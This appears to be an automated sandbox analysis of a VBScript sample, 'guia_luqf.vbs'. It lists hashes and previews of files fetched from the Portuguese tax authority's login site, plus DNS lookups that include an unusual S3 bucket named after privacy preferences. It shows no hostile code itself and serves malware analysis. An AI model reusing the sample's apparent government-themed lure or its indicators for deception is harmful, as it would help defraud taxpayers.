                                                                                                                MD5:D553B8F8CFF983D211D68FC7E9445121
                                                                                                                SHA1:DDD0F156ABA8E3C5F2BF865D81DB38052280D3DE
                                                                                                                SHA-256:47DFF31AB3E6C7ACB2D21E50F930D13816188F208BB62486E32F33A31CC21D9B
                                                                                                                SHA-512:16EC46A4C87090B3D6F8A60B35AE919050DEA0F6104E1F8A2C6B61E715C0E90900C33EF60569F1EB6195DA104938E519CE4F024637FECD521A208B86835C4454
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.10
                                                                                                                Preview:/*!.. * Bootstrap v3.3.4 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */..if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");+function(a){"use strict";var b=a.fn.jquery.split(" ")[0].split(".");if(b[0]<2&&b[1]<9||1==b[0]&&9==b[1]&&b[2]<1)throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher")}(jQuery),+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]};return!1}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one("bsTransitionEnd",function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b(),a.support.transi
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, ASCII text, with very long lines (5238), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):5418
                                                                                                                Entropy (8bit):5.295213776015613
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:t4A8XX1wZG2DcHcmlG8Q48tZGruP0XTepmNWb14ANxYPeqdqPqyPC0m2lY:tUwZG2g8myTtZ6lKQob1dHYPeIny6xX
                                                                                                                MD5:D704F7C9C62C47B265F2C5700A45743E
                                                                                                                SHA1:F652122ED0AAA37EDC4707975B45AE3641EC6D10
                                                                                                                SHA-256:20C35EBC2DAEB43DA1383ED5C762C2EDDFCF762B389883924397F75BB6442D7B
                                                                                                                SHA-512:E469B5C61A8CB94A31DF124F3159855434A4E0AEE386E20A5E82BBE1D23A353B58F29EB317BFB15DB8ED879BAECE851AC92F2DA1857D019D7C104BA0D813E6D2
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/modernizr.js?cb=5.2.10
                                                                                                                Preview:/* Modernizr 2.8.3 (Custom Build) | MIT & BSD.. * Build: http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-prefixes-domprefixes.. */..;window.Modernizr=function(a,b,c){function z(a){i.cssText=a}function A(a,b){return z(l.join(a+";")+(b||""))}function B(a,b){return typeof a===b}function C(a,b){return!!~(""+a).indexOf(b)}function D(a,b){for(var d in a){var e=a[d];if(!C(e,"-")&&i[e]!==c)return b=="pfx"?e:!0}return!1}function E(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)return d===!1?a[e]:B(f,"function")?f.bind(d||b):f}return!1}function F(a,b,c){var d=a.charAt(0).toUpperCase()+a.slice(1),e=(a+" "+n.join(d+" ")+d).split(" ");return B(b,"string")||B(b,"undefined")?D(e,b):(e=(a+" "+o.join(d+" ")+d).split(" "),E(e,b,c))}var d="2.8.3",e={},f=b.documentElement,g="modernizr",h=b.createElement(g),i=h.style,j,k={}.toString,l=" -webkit- -moz- -o- -ms- ".split(" "),m="Webkit Moz O ms",n=m.split(" "),o=m.toLowerCase().split(" "),p={},q={},r={},s=[],t=s.
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1609
                                                                                                                Entropy (8bit):4.686265065538421
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:mLHhP7OIkn2UFiOiV6eigpigNzbak/ef4igtjf4i0/WWig7RWiK:MB02CiOiTi8ioa6iriGijiK
                                                                                                                MD5:430DE688693604EBDF8B06F389A8E12E
                                                                                                                SHA1:98450828D02A8486B92FE86E56CD0B2D1E1B4D42
                                                                                                                SHA-256:E17E63ADB656344E4B23F5A7C6C0F70580551920BDE557D38C9C73A1E9ECF5A3
                                                                                                                SHA-512:FCF3DA5DEC2D2AC53278667EFEB95C784215C15610DF1A6A7E22A2A651F704DA857A764ED46AF712937B9367153882418E3526BA26453D645A916FC3500D3FC1
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/capslock-login.js?cb=5.2.10
                                                                                                                Preview:var capslockActive = false;..var inputNif = document.getElementById("password-nif");..var inputEori = document.getElementById("password-eori");....function capsLockEventDetect(event) {.. var capsNif = document.getElementById("caps-nif");.. var capsEori = document.getElementById("caps-eori");.. var curr = document.activeElement;.... if (event.getModifierState !== undefined && event.getModifierState("CapsLock")) {.. capslockActive = true;.. if (inputNif === curr) {.. capsNif.style.display = "block";.. }.. else if (capsEori && inputEori === curr) {.. capsEori.style.display = "block";.. }.. } else {.. capslockActive = false;.. capsNif.style.display = "none";.. if (capsEori) {.. capsEori.style.display = "none";.. }.. }..}....document.addEventListener("keydown", function(event) {.. capsLockEventDetect(event);..});....if (inputNif) {.. inputNif.addEventListener("blur", funct
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, ASCII text, with very long lines (1475)
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1525
                                                                                                                Entropy (8bit):4.898762569340083
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:DcsWRcieA/Fhxwkw4lPJju6m4ITcbz3LRQfFevzADIctm16A6mNmMg+GX7RRHfA:DydTat4lPJy0ITcP9AevUt9A6S9gd8
                                                                                                                MD5:74EF677768ABAA390ECD61C5E55F7D32
                                                                                                                SHA1:1362473BA9A3B0E993737D67862586FF7F611B6A
                                                                                                                SHA-256:FCC6F846F1230079B8049C30BAC80ABD2E9B2D68E8F90E985A33008F2574C294
                                                                                                                SHA-512:53F9ABE1BD59163142F5598A68AD0E1A821BF274DF122760731A16D7CBDA8DBC2C467D68D1981AFBFCA50A12A94CEBD636072DDF0C19AFEC5B8858B481B54D56
                                                                                                                Malicious:false
                                                                                                                URL:https://static.portaldasfinancas.gov.pt/app/pfstatic_static/js/pf-footer.js
                                                                                                                Preview:window.PF||(PF={}),window.PF.common||(PF.common={footer:'<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n.&ordm; 2, do Decreto-Lei n.&ordm; 118/2011, de 5 de dezembro. Para cumprimento do Regulamento Geral sobre a Prote&ccedil;&atilde;o de Dados (RGPD) e da Lei n.&ordm; 58/2019, de 8 de agosto, o Despacho n.&ordm; 13949-A/2022 designou a mestre In&ecirc;s Oliveira Andrade de Jesus como <a href="@info-url@/pt/at/Pages/Encarregado_protecao_dados.aspx" title="encarregada da prote&ccedil;&atilde;o de dados">encarregada da prote&ccedil;&atilde;o de dados</a> da AT. Os titulares dos dados podem contactar a encarregada da prote&ccedil;&atilde;o de dados da AT sobre todas as quest&otilde;es relacionadas com o tratamento dos seus dados pessoais e com o exerc&iacute;cio dos direitos que lhe s&atilde;o conferidos pelo RGPD atrav&eacute;s do endere&c
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):3511
                                                                                                                Entropy (8bit):4.819787220741833
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:RTnt1BsFq1BW1B6g1BuN4OdmC05fhi3JRhuKM+otpuUrrNrcZYX0lXW2NzqhVUVH:RncrCC6enD39cuCm2Nz4VUVjY+tvhBZ
                                                                                                                MD5:02FDD6A58827703E1B46D99DA0FB7FB0
                                                                                                                SHA1:FB8D3DCC85BA25E978A43D9F871BB94755B6ECD0
                                                                                                                SHA-256:8B751842C2EC5F3602CC30739CE41D3B7E611E5443DA7E483D72AB48AC683D1E
                                                                                                                SHA-512:DA0189817E4BF9D2B40DECFFD0B8BB25FC017B5115625E66736CA0E86712DF6819F2AC95518BA2378ADF9F47298E8E2A35806D9072E1A815AE8894B82DF226C7
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/pf/css/footer.css?cb=5.2.10
                                                                                                                Preview:@media print {.. .main-footer {.. display: none;.. }..}.....main-footer {.. background: #dbdee0;.. background: -moz-linear-gradient(top, #dbdee0 0%, #cdd1d3 100%);.. background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #dbdee0), color-stop(100%, #cdd1d3));.. background: -webkit-linear-gradient(top, #dbdee0 0%, #cdd1d3 100%);.. background: -o-linear-gradient(top, #dbdee0 0%, #cdd1d3 100%);.. background: -ms-linear-gradient(top, #dbdee0 0%, #cdd1d3 100%);.. background: linear-gradient(to bottom, #dbdee0 0%, #cdd1d3 100%);.. filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#dbdee0', endColorstr='#cdd1d3', GradientType=0);.. padding: 35px 0;.. color: #524f4f;.. font-size: 14px;.. min-height: 196px;.. overflow: hidden;.. position: relative;..}.....main-footer:before {.. content: "";.. display: block;.. width: 200px;.. height: 298px;.. background-image: url(../images/decoration/footer
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 429 x 727, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):43457
                                                                                                                Entropy (8bit):7.9638651297217935
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:tSWaGYgbYWSuQyZk/wmBfRih+EcQ0DccVdbNWPi8J5W2jLBEKpPL6zt334:t1bYg3gyZ8TOD5cLN58J42jLOKpza4
                                                                                                                MD5:841D0BC9367FBB99D878411AAFF20275
                                                                                                                SHA1:99D2C1BB03118760FDBEED83044AB49015252DD3
                                                                                                                SHA-256:D09142E539ED99866028C1E364414A3AE60B2CB6D0DA260D5C45EAF7959D9EB5
                                                                                                                SHA-512:EA917F73A202E02B67AE4F31E83728DEE29F03D63F4753B8F1741EA9E7562A09EAFA2A47F3D5152B78B884820C43854B693CB8E408086170BA8B014F4CC4163C
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/img/background.png
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):6518
                                                                                                                Entropy (8bit):2.6111970432860367
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:GjtIzfm79zXQbHCWfyADAolvx8qZybjc1:3Qzgb7y4TJtyP
                                                                                                                MD5:8102D44D0C555D9EA5F0F6E03131734B
                                                                                                                SHA1:108E7CFBE30E36C0FE73DE0591D541371225DC51
                                                                                                                SHA-256:B2CBEBB8F1479868C4FC79E20C8937D94859D45C3445E3C6ECC0841BEC20C67B
                                                                                                                SHA-512:9CDDCF5411D298395551A52168AAD14B3365F3E46CBD3EAA068D07D24E482CA0D73D561D6EDB59EA93C5220533DCF6C329ED92568AFC36BA9C47E651CD585610
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/icons/favicon.ico
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (8308), with no line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):8308
                                                                                                                Entropy (8bit):5.036239021416478
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:gpaAfkEVd6L9yLvbno+KyuoFfK9nVcGStW9qe5cR4NYRW:gpaAfki6Lcvo+KyPc9nOGStW8e5Y4N0W
                                                                                                                MD5:2842654782A75CBBC8CD66C60B72631D
                                                                                                                SHA1:EF3A49FE1BCF31CCA95CDEE5563928A850A1B154
                                                                                                                SHA-256:8A41D60F7762F2DB0792FD909C3C09725F93D8FE1E94EFCB2CA04293921E277A
                                                                                                                SHA-512:A34FCB9003AE5024320BC84884B026AFE8CDA0629FF0F0FC226F63ED44FC45C8F3AB4052714B35B49027D2DABC29721F960DA8FBA055BBF814EAAAE647B1726D
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.10
                                                                                                                Preview:(function(e,t){"use strict";function n(e){var t=Array.prototype.slice.call(arguments,1);return e.prop?e.prop.apply(e,t):e.attr.apply(e,t)}function s(e,t,n){var s,a;for(s in n)n.hasOwnProperty(s)&&(a=s.replace(/ |$/g,t.eventNamespace),e.bind(a,n[s]))}function a(e,t,n){s(e,n,{focus:function(){t.addClass(n.focusClass)},blur:function(){t.removeClass(n.focusClass),t.removeClass(n.activeClass)},mouseenter:function(){t.addClass(n.hoverClass)},mouseleave:function(){t.removeClass(n.hoverClass),t.removeClass(n.activeClass)},"mousedown touchbegin":function(){e.is(":disabled")||t.addClass(n.activeClass)},"mouseup touchend":function(){t.removeClass(n.activeClass)}})}function i(e,t){e.removeClass(t.hoverClass+" "+t.focusClass+" "+t.activeClass)}function r(e,t,n){n?e.addClass(t):e.removeClass(t)}function l(e,t,n){var s="checked",a=t.is(":"+s);t.prop?t.prop(s,a):a?t.attr(s,s):t.removeAttr(s),r(e,n.checkedClass,a)}function u(e,t,n){r(e,n.disabledClass,t.is(":disabled"))}function o(e,t,n){switch(n){case
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):1347
                                                                                                                Entropy (8bit):5.0340215087881965
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:VWza9Wzau0WXWjWhkedY9CWROJ+X9TNvyoihBsfZnbA8V6dwXbyBpA+nWb1:IzXzdvGChk19CWRX9P8BsfZn8mOU
                                                                                                                MD5:71144EED16DA6FCFF4DEB76B966F0814
                                                                                                                SHA1:7F8F5854C847525DCF64F79E63E8276E38ABD7AE
                                                                                                                SHA-256:2EEF55E879E9FFEB7A7A6F87D1805DCD4EF5E1D2659DD08E1FCE620121AA8BAC
                                                                                                                SHA-512:83F9830F99B87CC48739B82997533F35F7E5D6E9BB7AB647B53180B36EE5C60E600059B97B493624B323E140FD3EFBA56821D7B4158D58999F7E41FC2F100BD4
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/css/sa-custom.css?cb=5.2.10
                                                                                                                Preview:@font-face {.. font-family: 'sa_custom_caps';.. src: url('../fonts/sa_custom_caps.eot?s31xf0');.. src: url('../fonts/sa_custom_caps.eot?s31xf0#iefix') format('embedded-opentype'),.. url('../fonts/sa_custom_caps.ttf?s31xf0') format('truetype'),.. url('../fonts/sa_custom_caps.woff?s31xf0') format('woff'),.. url('../fonts/sa_custom_caps.svg?s31xf0#at_caps') format('svg');.. font-weight: normal;.. font-style: normal;..}....[class^="icon-sa-custom-"], [class*=" icon-sa-custom-"] {.. /* use !important to prevent issues with browser extensions that change fonts */.. font-family: 'sa_custom_caps' !important;.. speak: none;.. font-style: normal;.. font-weight: normal;.. font-variant: normal;.. text-transform: none;.. line-height: 1;.... /* Better Font Rendering =========== */.. -webkit-font-smoothing: antialiased;.. -moz-osx-font-smoothing: grayscale;..}.....icon-sa-custom-caps-lock:before {.. content: "\e900";..}.....half-width {.. width: 50% !important;..}.....foo
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1303), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):3496
                                                                                                                Entropy (8bit):4.9627602211027035
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:4WNFT6rFZdTat4lPJ90ITcP9AevUt9A6S9IAArqGnjdlzS9hakP1GzJ1tJwlgODJ:56rc4x9lDmYqAzm8Il5D5eFk
                                                                                                                MD5:1502FECE40BD14167173803D98F8281B
                                                                                                                SHA1:2B3F37EF634960A4E95C06A6A5F9F12932D0F586
                                                                                                                SHA-256:FE1B489D668E0538B6A0CAA3D2FDC372E7C32D70C036188E3910A016B75DE21F
                                                                                                                SHA-512:23C8FE828F2C78F1FDEEA7AC6EFFDA00F749757573001FA1235D953BD31E9D545451C28C4D5BD9FE05DD4D2E4F0C2695BD57EADB55C99AE7A100B8A3B6900621
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/footer/footer.js?cb=5.2.10
                                                                                                                Preview:window.onload = function() {.... /**.. * Preencher footer com a info do RGPD.. */.... var footerElem = document.getElementById("footer-rgpd-content");.... if (window.PF && window.PF.common && window.PF.common.footer) {.... footerElem.innerHTML = PF.common.footer;.... } else {.... footerElem.innerHTML = '<b>Dados Pessoais</b><br />A Autoridade Tribut&aacute;ria e Aduaneira (AT) trata dados pessoais no &acirc;mbito das suas atribui&ccedil;&otilde;es, designadamente as constantes do artigo 2.&ordm;, n.&ordm; 2, do Decreto-Lei n.&ordm; 118/2011, de 5 de dezembro. Para cumprimento do Regulamento Geral sobre a Prote&ccedil;&atilde;o de Dados (RGPD) e da Lei n.&ordm; 58/2019, de 8 de agosto, o Despacho n.. 13949-A/2022 designou a mestre In&ecirc;s Oliveira Andrade de Jesus como <a href="@info-url@/pt/at/Pages/Encarregado_protecao_dados.aspx" title="encarregada da prote&ccedil;&atilde;o de dados">encarregada da prote&ccedil;&atilde;o de dados</a> da AT. Os ti
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (21445), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):21587
                                                                                                                Entropy (8bit):5.291214897531632
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:QhpW5B+Jx6Utb7YlHqdS2L7Az548TsljN/tllEny+WC5MQPN3tCwV/vyxMLgoqn9:F+Jx6U2lHqdS2gz54pr/1Eny+WChaxMs
                                                                                                                MD5:A3601786B7EE8FA301939C8FD4F9CBA6
                                                                                                                SHA1:969FD5D7BEF5559B6FFD8EA477D4E7BA732F55AF
                                                                                                                SHA-256:AF39C945F12C4E06595178BE35788C26086EF65FF070326126AD00CBA7E5B1B0
                                                                                                                SHA-512:E6EDB291A36F54494F9AEA2E4EE9A0A39A19C4F8243A88F2FD02CBBD6316DFE001D9509A9355A154501F4E8A447EABD814838B2D0119A61841E31DDED8A01B03
                                                                                                                Malicious:false
                                                                                                                Preview:/*! jQuery Validation Plugin - v1.13.1 - 10/14/2014.. * http://jqueryvalidation.org/.. * Copyright (c) 2014 J.rn Zaefferer; Licensed MIT */..!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a(jQuery)}(function(a){a.extend(a.fn,{validate:function(b){if(!this.length)return void(b&&b.debug&&window.console&&console.warn("Nothing selected, can't validate, returning nothing."));var c=a.data(this[0],"validator");return c?c:(this.attr("novalidate","novalidate"),c=new a.validator(b,this[0]),a.data(this[0],"validator",c),c.settings.onsubmit&&(this.validateDelegate(":submit","click",function(b){c.settings.submitHandler&&(c.submitButton=b.target),a(b.target).hasClass("cancel")&&(c.cancelSubmit=!0),void 0!==a(b.target).attr("formnovalidate")&&(c.cancelSubmit=!0)}),this.submit(function(b){function d(){var d,e;return c.settings.submitHandler?(c.submitButton&&(d=a("<input type='hidden'/>").attr("name",c.submitButton.name).val(a(c.submitButton).val()).appendTo(c.currentForm)),e=
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 618 x 166, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):10264
                                                                                                                Entropy (8bit):7.893606373253685
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:r9/l7HNm2qUdKrEC+VmNIgargB0UFj6jbUpm5e93/YmkpcAX:r9lHXC3ug9FCP5e9vLnAX
                                                                                                                MD5:91E9E0C62F158101C511C746B98AB45D
                                                                                                                SHA1:3D9E122EA989782126594142F5AD03E257A1D96C
                                                                                                                SHA-256:A2BC8BF86EF8D948D5CB87EC1E4B185BF87CF4A731F2F93EA5CC29AE64302AF6
                                                                                                                SHA-512:4C8EDE889D61BE5474BF341283FE2E7756E37E9B5B466F47B1709316EF72088584104F914274E035B1BF36812A80865EDE06DAC044704EFA0C8C72436D3812CE
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/img/autenticacaogov.png
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):2107
                                                                                                                Entropy (8bit):4.954992161322799
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:v9IgFVDZyWbpUuzmO3Zi7f5hHU8nDHEH1FTLFvjrNV7ETfFz3yCPrVUb2:5DZ5V7B307fNDalqRLpL
                                                                                                                MD5:8A8991F71F5B1ACAA1FB1C5CCA4729E4
                                                                                                                SHA1:53D0D36F0DE6C2D0CF1222F9F4BAA49115B240AC
                                                                                                                SHA-256:74470D0811A33D6360A606CC6B43F4C729571AE63A381188CB55E41409F38318
                                                                                                                SHA-512:3C128F2C69FB0BEBC4693BE42A0F6B33D7B1C96DFF47399A17FE5E2E02ED7BF5B65D9D8D13CF4F53BE1740858847E4C3E1576A388179688074AC694CC53B0FDE
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/css/tabs.css?cb=5.2.10
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (21445), with CRLF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):21587
                                                                                                                Entropy (8bit):5.291214897531632
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:QhpW5B+Jx6Utb7YlHqdS2L7Az548TsljN/tllEny+WC5MQPN3tCwV/vyxMLgoqn9:F+Jx6U2lHqdS2gz54pr/1Eny+WChaxMs
                                                                                                                MD5:A3601786B7EE8FA301939C8FD4F9CBA6
                                                                                                                SHA1:969FD5D7BEF5559B6FFD8EA477D4E7BA732F55AF
                                                                                                                SHA-256:AF39C945F12C4E06595178BE35788C26086EF65FF070326126AD00CBA7E5B1B0
                                                                                                                SHA-512:E6EDB291A36F54494F9AEA2E4EE9A0A39A19C4F8243A88F2FD02CBBD6316DFE001D9509A9355A154501F4E8A447EABD814838B2D0119A61841E31DDED8A01B03
                                                                                                                Malicious:false
                                                                                                                URL:https://www.acesso.gov.pt/autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.10
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):132
                                                                                                                Entropy (8bit):5.11667638873558
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:PuhvLUiSNDrNqTbTQiymCTUSbpLRAWzPf8ImhHrK5TvntHR:PuhvoLBMTbTQAFC3AWrIBgHR
                                                                                                                MD5:89E93357A5B85971EF2E8C719E858D2C
                                                                                                                SHA1:0BCFE2B65CE1A26EC0AEE789D67672EE399A32A6
                                                                                                                SHA-256:A4AA52334DE292554BF5EE1DF39397F8E9910080B8332E8752B139AF72C13485
                                                                                                                SHA-512:FDB568D659C036AEEDC68D8EBE327F8CE18C9ABBAA0BC8D46B0C314FADA6DD3F5F58FCECFB04197896B40DFC5AB1FEE1A5B6F35F30DE6B6AD7B9BA73FD08BB33
                                                                                                                Malicious:false
                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlQwFDawOwNyhIFDeeNQA4SBQ3OQUx6EhcJgK_h7X-xEz0SBQ2Zn7JxEgUNzkFMeg==?alt=proto
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (8308), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):8308
                                                                                                                Entropy (8bit):5.036239021416478
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:gpaAfkEVd6L9yLvbno+KyuoFfK9nVcGStW9qe5cR4NYRW:gpaAfki6Lcvo+KyPc9nOGStW8e5Y4N0W
                                                                                                                MD5:2842654782A75CBBC8CD66C60B72631D
                                                                                                                SHA1:EF3A49FE1BCF31CCA95CDEE5563928A850A1B154
                                                                                                                SHA-256:8A41D60F7762F2DB0792FD909C3C09725F93D8FE1E94EFCB2CA04293921E277A
                                                                                                                SHA-512:A34FCB9003AE5024320BC84884B026AFE8CDA0629FF0F0FC226F63ED44FC45C8F3AB4052714B35B49027D2DABC29721F960DA8FBA055BBF814EAAAE647B1726D
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:ASCII text, with very long lines (32086), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):95790
                                                                                                                Entropy (8bit):5.394132126458497
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:EPEkjP+iADIOr/NEe876nmBu3HvF38sEeL8FoqqhJ7SerN5wVI+xcBpPv7E+nzmN:bNMzqhJvN32cBd7M6Whca98Hr4
                                                                                                                MD5:4DC834D16A0D219D5C2B8A5B814569E4
                                                                                                                SHA1:4FBE0563917D6F6289E4E1B4A0A8758E4E43BDA9
                                                                                                                SHA-256:91222F96F34735EBC88DF208017E54D4329B9202E3E52367FB8B149698A1A5EF
                                                                                                                SHA-512:6FBEC4785A21520FA623D1A151C6C8B64BAA1321AC6918A127BCFC22E49EC2E3BCD161AF9C237BD5C70BC4046EB12CF434563F86CBDC9876EB67FB2DEA87034B
                                                                                                                Malicious:false
                                                                                                                File type:ASCII text, with very long lines (1026), with CRLF line terminators
                                                                                                                Entropy (8bit):5.484805521965355
                                                                                                                TrID:
                                                                                                                  File name:guia_luqf.vbs
                                                                                                                  File size:4'092'491 bytes
                                                                                                                  MD5:3163a6526f07d203061a91ff6e7236c7
                                                                                                                  SHA1:4561ad4c5e704553b187f6e49218f234a50f157d
                                                                                                                  SHA256:0799f38e9829f8d7c0926dcf77dc1e1ecb959e209edb9a7320e6bfd331d7e0ad
                                                                                                                  SHA512:03ded39d856d576fdc9dee68d476f8ee5a34da35b51beb865a543c56e70c0c336aa304389f4c499e7edfb5faa66fc66e96c2f90967f3719023026d48b84bf131
                                                                                                                  SSDEEP:49152:6R/vT1vAcvA7LvGvbv3TvOv1/vXvkvzOvbv1vlvSvgvNvHZvWnvxPKuwmvw:qnxPSizbq9/IWz1Fe0tJAnw
                                                                                                                  TLSH:8C16D7993681F07102D32166A0FF2D09FE3D1921590D9C54EE62D7C93C2994AA27FEFE
                                                                                                                  File Content Preview:'){var o=e[r];'..'){var i=r[n],o=i.func;'..');'..'var l=function(){var e=(0,t.getDocumentReferrer)(),r,n;'..');'..',siblingsMatchingSameSelector:function(n,o){var a=[];'..'){var v=e[d=u[f]],h=t[d],g=n?n(i?h:v,i?v:h,d):void 0;'..';'..'++i<o;'..'}'..',heap)
                                                                                                                  Icon Hash:68d69b8f86ab9a86
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 14, 2024 14:59:48.242217064 CET | 192.168.2.4 | 1.1.1.1 | 0x57ea | Standard query (0) | privacidadeepreferenciapt.s3.eu-north-1.amazonaws.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:49.484968901 CET | 192.168.2.4 | 1.1.1.1 | 0x7b9d | Standard query (0) | www.acesso.gov.pt | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:49.485121012 CET | 192.168.2.4 | 1.1.1.1 | 0x3d56 | Standard query (0) | www.acesso.gov.pt | 65 | IN (0x0001) | false
Nov 14, 2024 14:59:51.710818052 CET | 192.168.2.4 | 1.1.1.1 | 0xf816 | Standard query (0) | static.portaldasfinancas.gov.pt | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:51.710972071 CET | 192.168.2.4 | 1.1.1.1 | 0x4d6f | Standard query (0) | static.portaldasfinancas.gov.pt | 65 | IN (0x0001) | false
Nov 14, 2024 14:59:53.321265936 CET | 192.168.2.4 | 1.1.1.1 | 0x5a87 | Standard query (0) | static.portaldasfinancas.gov.pt | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:53.321620941 CET | 192.168.2.4 | 1.1.1.1 | 0x7277 | Standard query (0) | static.portaldasfinancas.gov.pt | 65 | IN (0x0001) | false
Nov 14, 2024 14:59:53.849481106 CET | 192.168.2.4 | 1.1.1.1 | 0x4380 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Nov 14, 2024 14:59:53.849679947 CET | 192.168.2.4 | 1.1.1.1 | 0xc77e | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Nov 14, 2024 14:59:54.202958107 CET | 192.168.2.4 | 1.1.1.1 | 0xa808 | Standard query (0) | www.portaldasfinancas.gov.pt | A (IP address) | IN (0x0001) | false
